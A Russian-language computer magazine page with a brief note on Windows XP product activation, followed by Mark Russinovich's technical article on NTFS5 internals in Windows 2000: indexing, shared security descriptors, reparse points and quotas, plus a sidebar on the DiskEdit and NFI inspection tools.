Майкл Оти – научный редактор американского журнала Windows NT Magazine, президент компании TECA, специализирующейся на разработке программного обеспечения и оказании консультационных услуг. С ним можно связаться по адресу: mikeo@teca.com.


Процедурa активации Windows Product Activation

Если, приобретая Windows XP, пользователь выбирает лицензионное соглашение видов Microsoft Open, Select или Enterprise, ему нет нужды заботиться о процедуре активации продукта — Windows Product Activation (WPA). При анализе ключа продукта, связанного с этими лицензиями, система обходит процедуру активации (лицензионная политика Microsoft описана в статье на сайте Microsoft. http://www.microsoft.com/business/licensing). Аналогичное замечание справедливо и для копий XP, предустановленных на OEM-системы, в которых активация была проведена заранее, и в процессе начального развертывания ОС никаких вопросов на тему активации задано не будет. Следует, однако, иметь в виду, что, если в аппаратном обеспечении было произведено более четырех изменений, система потребует повторной активации продукта. Приобретая Windows XP в магазине (retail version), следует заранее быть готовым в конце процесса установки ответить на вопрос об активации продукта, а также зарегистрировать его (дополнительное требование).

Для автоматической активации копии XP необходимо Internet-соединение. Программа активации отсылает уникальный идентификационный код системы в Microsoft. В ответ возвращается некоторый ключ, который активирует операционную систему. XP использует данные об аппаратной конфигурации, а также значение номера Product Activation Key, который пользователь вводил в процессе установки, для генерации указанного ключа. Если Internet-соединение отсутствует, для завершения процесса активации следует позвонить в Microsoft по номеру, указанному на экране программы Windows Product Activation Wizard. Microsoft предоставляет 30-дневную отсрочку для выполнения этой процедуры, а по истечении установленного срока XP возвращается к экрану Welcome и предлагает завершить процедуру активации.

Хотя разработчики не разглашают всех подробностей WPA, утверждается, что процедура активации не передает никакой персональной информации о клиенте в Microsoft. Одна из фирм-разработчиков исследовала процедуру WPA и опубликовала результаты с подробным описанием (см. http://www.licenturion.com/xp).


Рисунок 1. Функции, не поддерживаемые версией XP Home.
Служба автоматического восстановления ASR
Клиент для NetWare
Работа в домене
Поддержка двух процессоров
Динамические диски
Шифрование EFS
Управление доступом на уровне файлов
Групповые политики
Автоустановка приложений IntelliMirror
Протокол IPSecurity (IPSec)
Поддержка многонационального интерфейса
Автономные папки
Удаленное управление Remote Desktop
Удаленная установка RIS
Перемещаемые профили
Протокол SNMP

 

 

Возможности NTFS

Новые возможности NTFS позволяют оптимизировать использование диска и расширить функциональность программ.

NTFS, собственная файловая система Windows 2000, непрерывно совершенствовалась со времени выпуска Windows NT 3.1. Она изначально обладала возможностями высокоуровневой файловой системы, но в Windows 2000 появились важные изменения, которые были сделаны в связи с необходимостью решать проблемы, возникающие на корпоративном уровне при переходе организаций на NT. Например, благодаря консолидации информации о безопасности повышается эффективность повседневной работы с NTFS; другие функции, такие, как управление квотами, должны использоваться в прикладных программах или активизироваться и применяться администратором.

На этот раз я расскажу о возможностях версии NTFS 5.0 (NTFS5), вошедшей в состав Windows 2000, и о влиянии новых функций на поведение и формат диска NTFS. Приступая к чтению статьи, важно четко понимать основные принципы построения дисковой структуры NTFS, а также иметь представление о главной таблице файлов (Master File Table, MFT), типах атрибутов и резидентных и нерезидентных атрибутах. Подробно основы NTFS описаны в статье Шона Дейли «NTFS5 против FAT32» (Windows 2000 Magazine/RE №4, 2000). Во врезке «Исследуем дисковые структуры NTFS» рассказано о некоторых инструментах просмотра и источниках информации об элементах внутренней структуры данных NTFS.

Универсальная индексация

Некоторые новые свойства NTFS5 основываются на фундаментальной особенности NTFS, именуемой индексацией атрибутов (attribute indexing). Индексация атрибутов заключается в сортировке элементов с атрибутом определенного типа при помощи эффективного механизма хранения, обеспечивающего быстрый просмотр. В версиях NTFS, предшествовавших Windows 2000, индексация допускалась только для индексного атрибута $I30, в котором хранятся элементы каталога. В процессе индексации атрибутов элементы каталога сортируются по имени и сохраняются в B+ дереве (форма двоичного дерева, в каждом узле которого хранится несколько элементов). На Рисунке 1 показана запись MFT каталога, в трех узлах которой содержится девять элементов, по три в каждом узле. Корень B+ дерева находится в атрибуте index root (корень индекса). В записи MFT каталога девять элементов не умещается, поэтому некоторые элементы приходится хранить в другом месте. Для этого NTFS выделяет два буфера размещения индексов (index allocation) для хранения двух записей (как правило, корень индекса и буферы размещения индексов мо-гут хранить элементы для более чем трех файлов, в зависимости от длины имен). Размер записи MFT — 1 Кбайт, а размер буферов размещения индексов — 4 Кбайт.

Красные стрелки указывают, что элементы NTFS хранятся в алфавитном порядке. Если запустить программу, которая открывает файл e.bak в показанном на рисунке каталоге, то NTFS читает атрибут индексного корня, содержащий элементы для d.new, h.txt и i.doc, и сравнивает строку e.bak с именем первого элемента, d.new. NTFS делает вывод, что алфавитный номер e.bak больше, чем d.new, и переходит к следующему элементу — h.txt. Повторив операцию сравнения, NTFS выясняет, что алфавитный номер e.bak меньше, чем h.txt. Затем NTFS отыскивает в записи каталога h.txt номер виртуального кластера (virtual cluster number, VCN) индексного буфера, содержащего элементы каталога, алфавитные номера которых меньше, чем h.txt, но больше, чем d.new. VCN представляет собой порядковый номер кластера в файле или каталоге. На основании информации о размещении кластеров NTFS преобразует VCN в логический номер кластера (Logical Cluster Number, LCN), т. е. номер кластера относительно начала тома. Если элемент каталога для h.txt не содержит VCN индексного буфера, NTFS делает вывод, что каталог h.txt не содержит файла e.bak и сообщает о неудачном завершении поиска.

Получив VCN начального кластера индексного буфера, NTFS читает буфер размещения индексов и просматривает его в поисках совпадений. На Рисунке 1 первый же элемент индексного буфера совпадает с критерием поиска, и NTFS читает номер записи MFT e.bak из элемента каталога e.bak. В элементах каталога хранится и другая информация: в частности, временные отметки (например, время создания и последнего изменения), размер и атрибуты. NTFS хранит эту информацию и в записи MFT файла, но, благодаря дублированию информации в элементе каталога, читать запись MFT файла при составлении списков каталогов и выполнении простых файловых запросов не требуется.

Элементы каталогов сортируются по алфавиту, и именно поэтому в списках каталогов NTFS файлы всегда располагаются в алфавитном порядке. В отличие от NTFS, FAT не сортирует каталог, поэтому списки FAT не сортированы. Кроме того, поскольку элементы NTFS хранятся в B+ дереве, механизм поиска конкретных файлов в больших каталогах очень эффективен; обычно достаточно просмотреть лишь часть каталога. Данный подход отличается от линейного метода FAT, при использовании которого для поиска одного имени иногда приходится просматривать весь каталог.

В версиях NTFS, предшествовавших Windows 2000, индексировались только имена файлов, но NTFS5 обеспечивает универсальную индексацию, сохраняя в индексах произвольные данные и сортируя элементы данных не по имени, а по другим параметрам. Универсальная индексация используется для управления дескрипторами безопасности, информацией о квотах, точках повторной обработки и идентификаторах файловых объектов, т. е. элементами NTFS5, о которых идет речь в данной статье.

Консолидированная безопасность

NTFS всегда располагала функциями безопасности, позволяющими администратору указать пользователей, которым разрешен или запрещен доступ к тем или иным файлам и каталогам. В версиях NTFS, предшествовавших Windows 2000, дескриптор безопасности каждого файла и каталога хранился в его собственном атрибуте безопасности. В большинстве случаев администраторы назначают единые параметры безопасности всему дереву каталогов, что приводит к дублированию дескрипторов безопасности для всех файлов и подкаталогов, к которым применяются параметры. Такое дублирование может привести к значительным потерям дискового пространства в многопользовательских средах, таких, как Windows 2000 Server Terminal Services и NT Server 4.0, Terminal Server Edition (WTS), где дескрипторы безопасности могут содержать элементы для многих учетных записей. NTFS5 оптимизирует выделение дискового пространства для хранения дескрипторов безопасности, сохраняя лишь один экземпляр каждого дескриптора безопасности на томе в центральном файле метаданных с именем $Secure.

Рисунок 2. Как работает файл метаданных $Secure.

В файле $Secure хранятся два индексных атрибута — $SDH и $SII — и атрибут потока данных, именуемый $SDS (см. Рисунок 2). NTFS5 назначает каждому уникальному дескриптору на томе внутренний идентификатор безопасности NTFS (не путать с SID, уникально идентифицирующим компьютеры и учетные записи пользователей) и хеширует дескриптор безопасности в соответствии с простым хеш-алгоритмом. Хеш-значение — потенциально неуникальное сокращенное представление дескриптора. Элементы в индексе $SDH отображают хеш-значения дескриптора безопасности на область хранения дескриптора безопасности в атрибуте данных $SDS, а индекс $SII отображает на область хранения дескриптора безопасности в атрибуте данных $SDS идентификаторы безопасности NTFS5.

Назначив дескриптор безопасности файлу или каталогу, NTFS получает хеш-значение дескриптора и просматривает индекс $SDH в поисках совпадений. NTFS сортирует элементы индекса $SDH согласно хеш-значению соответствующего дескриптора безопасности и сохраняет элементы в B+ дереве. Обнаружив для дескриптора совпадение в индексе $SDH, NTFS определяет смещение дескриптора безопасности элемента из записи $SDS Offset и считывает дескриптор безопасности из атрибута $SDS. Если совпадают хеш-значения, но не дескрипторы безопасности, то NTFS ищет еще один совпадающий элемент в индексе $SDH. Если NTFS обнаруживает полное совпадение, то файл или каталог, которому назначен дескриптор безопасности, может установить связь с дескриптором безопасности в атрибуте $SDS.

NTFS устанавливает связь, считывая идентификатор безопасности из элемента $SDH и сохраняя его в атрибуте $STANDARD_INFORMATION файла или каталога. В атрибуте $STANDARD_INFORMATION системы NTFS, который имеют все файлы и каталоги, хранится базовая информация о файле, в том числе атрибуты и временные метки. В Windows 2000 этот атрибут расширен, в нем появилась дополнительная информация, например идентификатор безопасности файла.

Если NTFS не обнаруживает в индексе $SDH элемента с дескриптором безопасности, совпадающим с назначаемым, значит, новый дескриптор уникален для тома, и NTFS назначает ему новый внутренний ID безопасности. Внутренние ID безопасности NTFS представляют собой 32-разрядные величины, а идентификаторы SID обычно в несколько раз длиннее, поэтому представление идентификаторов SID идентификаторами безопасности NTFS позволяет сэкономить место в атрибуте $STANDARD_INFORMATION. Затем NTFS добавляет дескриптор безопасности в атрибут $SDS, который сортируется в B+ дереве по ID безопасности NTFS, и дополняет индексы $SDH и $SII элементами, указывающими на смещение дескриптора в массиве данных $SDS.

Когда приложение пытается открыть файл или каталог, NTFS отыскивает дескриптор безопасности файла или каталога с помощью индекса $SII.

NTFS читает внутренний ID безопасности файла или каталога из атрибута $STANDARD_INFORMATION записи MFT, а затем использует индекс $SII файла $Secure для поиска элемента ID в атрибуте $SDS. По смещению в атрибуте $SDS система NTFS считывает дескриптор безопасности и завершает проверку безопасности. NTFS5 не удаляет элементы файла $Secure, даже если с ним не связано ни одного файла или каталога на томе. Наличие неудаленных элементов не приводит к значительной потере дискового пространства, так как число уникальных дескрипторов безопасности на большинстве томов, даже используемых в течение длительного времени, сравнительно невелико.

Благодаря универсальной индексации NTFS5 файлы и каталоги с одинаковыми параметрами безопасности эффективно используют общие дескрипторы. С помощью индекса $SII NTFS быстро отыскивает дескрипторы безопасности в файле $Secure в ходе проверок безопасности, а индекс $SDH позволяет быстро определить, имеется ли в файле $Secure ранее сохраненный дескриптор безопасности, пригодный для совместного использования с данным файлом или каталогом.

Точки повторной обработки

Точки повторной обработки позволяют приложению связать блок своих данных с файлом или каталогом, а диспетчеру объектов Object Manager — выполнить повторный поиск имени, когда прикладная программа обнаруживает точку повторной обработки. Помимо данных в точке повторной обработки хранится программный код, который идентифицирует принадлежность точки повторной обработки определенному приложению. Сами по себе точки повторной обработки бесполезны, но благодаря им программисты могут наращивать функциональность NTFS. В Windows 2000 предусмотрено несколько типов точек повторной обработки, в том числе точки монтирования томов, подсоединения каталогов NTFS и управления иерархическими хранилищами данных (Hierarchical Storage Management, HSM). Я объясню, как работают все эти функции, а затем подробно расскажу о реализации точек повторной обработки.

Любой том NTFS доступен лишь после того, как ему присвоено символьное обозначение. Точки монтирования NTFS5 позволяют привязать том к каталогу монтирования на родительском томе NTFS5, не присваивая символьного обозначения дочернему тому. В результате появляется возможность объединить несколько томов под одной буквой. Например, если смонтировать том, содержащий каталог \articles, к точке монтирования с именем C:\documents, то можно использовать путь C:\articles\documents для доступа к файлам каталога \documents. Точка монтирования представляет собой точку повторной обработки, данные которой состоят из внутреннего имени тома. Внутреннее имя имеет форму \??\Volume{XX-XX-XX-XX}, где X — числа, образующие глобальный уникальный ID (GUID), присвоенный тому операционной системой.

Если открыть файл C:\articles\documents\column.doc, то NTFS обнаруживает точку монтирования, связанную с каталогом \documents. NTFS читает хранящиеся в ней данные точки повторной обработки (имя тома) и передает в Object Manager статус точки повторной обработки. Диспетчер ввода/вывода перехватывает информацию о статусе, анализирует данные и определяет, что NTFS обнаружила точку монтирования. Диспетчер ввода/вывода изменяет искомое имя и заставляет Object Manager (компонент ядра, который отвечает поиску имен) провести повторный поиск с измененным путем \??\Volume{GUID}\documents\column.doc. В процессе повторного поиска анализ имени \documents\co-lumn.doc продолжится на смонтированном томе. Создать точки монтирования и составить их список можно с помощью оснастки Disk Management консоли управления Microsoft Management Console (MMC) или инструмента командной строки Mountvol, поставляемого вместе с Windows 2000.

Точки подсоединения каталогов NTFS похожи на точки монтирования, и диспетчер ввода/вывода и Object Manager выполняют подсоединение так же, как монтирование. Однако точки подсоединения устанавливают связь с каталогами, а не с томами. Точки подсоединения Windows 2000 эквивалентны символьным ссылкам UNIX (но в отличие от символьных ссылок UNIX, точки подсоединения нельзя применять к файлам). Если создать точку подсоединения C:\articles\documents, связанную с каталогом D:\documents, то можно обращаться к файлам в D:\documents, используя путь C:\articles\documents. В точке подсоединения хранится информация о перенаправленном пути, и если NTFS обнаруживает точку подсоединения, то, как и в случае с точкой монтирования, диспетчер ввода/вывода изменяет имя и инициирует повторный поиск имени. Принцип действия точки подсоединения показан на Рисунке 3. Когда приложение открывает C:\directory1\file, NTFS обнаруживает точку повторной обработки в каталоге C:\directory1, указывающую на каталог C:\directory2. Диспетчер ввода/вывода изменяет имя на C:\directory2\file, и приложение в итоге открывает файл C:\directory2\file.

Рисунок 3. Пример точки повторной обработки.

В Windows 2000 нет инструментов для создания точек подсоединения, и Microsoft официально не поддерживает такие инструменты, так как использование путей с подсоединением может нарушить работу некоторых прикладных программ. Однако создавать подсоединения и составлять их списки можно с помощью инструмента Linkd из набора ресурсов Microsoft Windows 2000 Resource Kit или бесплатной утилиты Junction (http://www.sysinternals.com/misc.htm).

Повторный анализ пути используется не во всех точках повторной обработки. В системе HSM точки повторной обработки HSM служат для прозрачной миграции редко используемых файлов в резервное хранилище данных. Когда HSM переносит файл в архив, содержимое файла удаляется, а на его месте создается точка повторной обработки. В данных точки повторной обработки содержится информация, используемая системой HSM для поиска файла на архивном носителе. Если впоследствии приложение обращается к хранящемуся в HSM файлу, то HSM-драйвер RsFilter.sys (Remote Storage Filter — фильтр удаленного хранения данных) перехватывает код повторной обработки, пересылаемый NTFS в Object Manager. Драйвер удаляет точку повторной обработки, извлекает файл с архивного носителя, а затем повторяет первоначальный запрос. На этот раз NTFS обращается к файлу, как к любому другому, и операции по перемещению данных не влияют на работу приложения.

Если точка повторной обработки связана с файлом или каталогом, то NTFS создает для нее атрибут с именем $Reparse. В этом атрибуте хранятся код и данные точки повторной обработки. Поэтому NTFS без труда обнаруживает все точки повторной обработки на томе, а в файле метаданных с именем \$Extend\$Reparse хранятся элементы, связывающие номера записи MTF файла и каталога точки повторной обработки с ассоцированными с ними кодами повторной обработки. NTFS сортирует элементы по номеру записи MTF в индексе $R.

Отслеживание квот

Экран 1. Активизация квотирования.

Системы Windows 2000 Server и NT Server часто используются в качестве файл-серверов. Слабое место NT — отсутствие у системного администратора встроенных инструментов для отслеживания и ограничения дискового пространства на сервере, занимаемого отдельными пользователями. Чтобы устранить этот пробел в функциональности NT, независимые поставщики выпускают несколько продуктов для управления квотами. Но в Windows 2000 уже есть базовые функции квотирования, которые во многих случаях позволяют обойтись без дополнительных инструментов. Функции управления квотами Windows 2000 построены на базе механизма квотирования NTFS (на томах FAT квоты выделить нельзя) в соответствии с моделью обслуживания отдельных томов и пользователей. Иными словами, администратор может использовать интерфейс, показанный на Экране 1, чтобы указать предупреждения и ограничить дисковое пространство, предоставляемое в распоряжение пользователя на томе NTFS.

Рисунок 4. Как работает файл метаданных $Quota.

NTFS хранит информацию о квотировании в файле метаданных \$Extend\$Quota, состоящих из индексов $O и $Q. На Рисунке 4 показана структура этих индексов. Точно так же, как NTFS назначает каждому дескриптору безопасности уникальный внутренний ID безопасности, каждому пользователю назначается уникальный ID пользователя. Когда администратор определяет информацию о квоте для пользователя, NTFS назначает ID пользователя, соответствующий идентификатору SID пользователя. В индексе $O создается запись, которая отображает SID на ID пользователя, индекс сортируется по ID пользователя; в индексе $Q создается запись для управления квотой. Запись управления квотой содержит величину квоты, выделенной пользователю, а также размер занимаемого дискового пространства.

Когда приложение создает файл или каталог, NTFS получает SID пользователя программы и отыскивает соответствующий ID пользователя в индексе $O. NTFS записывает ID пользователя в атрибут $STANDARD_INFORMATION нового файла или каталога и засчитывает все дисковое пространство, выделенное файлу или каталогу, в счет квоты пользователя. Затем NTFS отыскивает элемент квоты в индексе $Q и определяет, не превысил ли пользователь своего порога предупреждения или дискового лимита. Если выделение нового пространства привело к превышению порога, то NTFS принимает соответствующие меры: например, заносит запись в журнал системных событий или запрещает пользователю создать файл или каталог. По мере изменения размера файла или каталога NTFS обновляет запись управления квотой, связанную с ID пользователя в атрибуте $STANDARD_INFORMATION. Система NTFS использует метод универсальной индексации для эффективной привязки ID пользователя к SID учетной записи и быстрого поиска информации о квоте пользователя по его идентификатору.

Продолжение следует...

Рассказом о квотировании заканчивается первая часть данной статьи. Во второй части мы продолжим знакомство с новыми возможностями NTFS: механизмом отслеживания распределенных связей и изменений томов, функциями для работы с разреженными файлами и шифрования данных.

Марк Русинович — доктор философии, редактор Windows 2000 Magazine. С ним можно связаться по адресу: mark@sysinternals.com или http://www.sysinternals.com/.


Исследуем дисковые структуры NTFS

Для исследования внутренних дисковых структур NTFS существует несколько общедоступных инструментов. Среди них — DiskEdit, встроенный инструмент тестирования NTFS, по недосмотру Microsoft оказавшийся на компакт-диске Windows NT 4.0 Service Pack 4 (SP4), одна из самых мощных известных мне программ просмотра NTFS. DiskEdit, окно которого представлено на Экране A, позволяет ознакомиться со структурами, образующими файлы и каталоги, а также с данными атрибутов и преобразовать пути файлов и каталогов во входные коды таблицы MFT. Документация по DiskEdit отсутствует, но я опубликовал учебное пособие в сборнике бесплатных бюллетеней Sysinternals Newsletter (http://www.sysinternals.com/newsletter.htm). Чтобы использовать DiskEdit вместе с Windows 2000, необходимо скопировать файлы ifsutil.dll, ulib.dll, untfs.dll и ufat.dll из каталога \winnt\system32 системы Windows NT в каталог, в котором нужно разместить DiskEdit.

Экран A. Утилита DiskEdit.

Те, у кого нет компакт-диска с SP4, могут воспользоваться утилитой NTFS File Sector Information Utility (NFI), поставляемой Microsoft в составе пакета OEM Support Tools по адресу: http:\\support.microsoft.com/support/ kb/articles/q253/0/66.asp (помимо NFI в пакете OEM Support Tools имеются утилиты отладки и расширения отладчика ядра, с помощью которых администраторы и программисты могут анализировать аварийные дампы).

С помощью запускаемых из командной строки шаблонов NFI можно собрать информацию о конкретном файле или каталоге или обо всех файлах на томе, найти файл или каталог, в котором расположен данный логический сектор диска, а также отыскать файл или каталог, содержащий конкретный физический сектор. Например, команда

nfi C: 123

сообщает имя файла на томе C:, который содержится в 123 секторе тома. Чтобы исследовать структуры данных NTFS, можно воспользоваться этой же командой, не указывая номер сектора, и NFI выдаст подробную информацию об атрибутах всех файлов на диске. Можно ввести имя файла метаданных, описанных в статье, и просмотреть содержащиеся в них атрибуты. Например, если выполнить команду

nfi c:\$extend\$quota

на квотируемом томе, то будет видно, что файл $Quota содержит индексы с именами $O и $Q:

File 24
\$Extend\$Quota
$STANDARD_INFORMATION (resident)
$FILE_NAME (resident)
$INDEX_ROOT $O (resident)
$INDEX_ROOT $Q (resident)

Еще один источник информации о дисковой структуре NTFS — книга Гэри Неббета «Windows NT/2000 Native API reference» (издательство New Readers Publishing, 2000). В приложении приведены определения многих дисковых структур NTFS (в некоторых случаях отражены изменения, внесенные в Windows 2000) и содержится исходный текст Win32-программы, с помощью которой можно получить доступ к структурам данных в обход драйвера файловой системы NTFS и создать дамп содержимого тома.



Хостинг от uCoz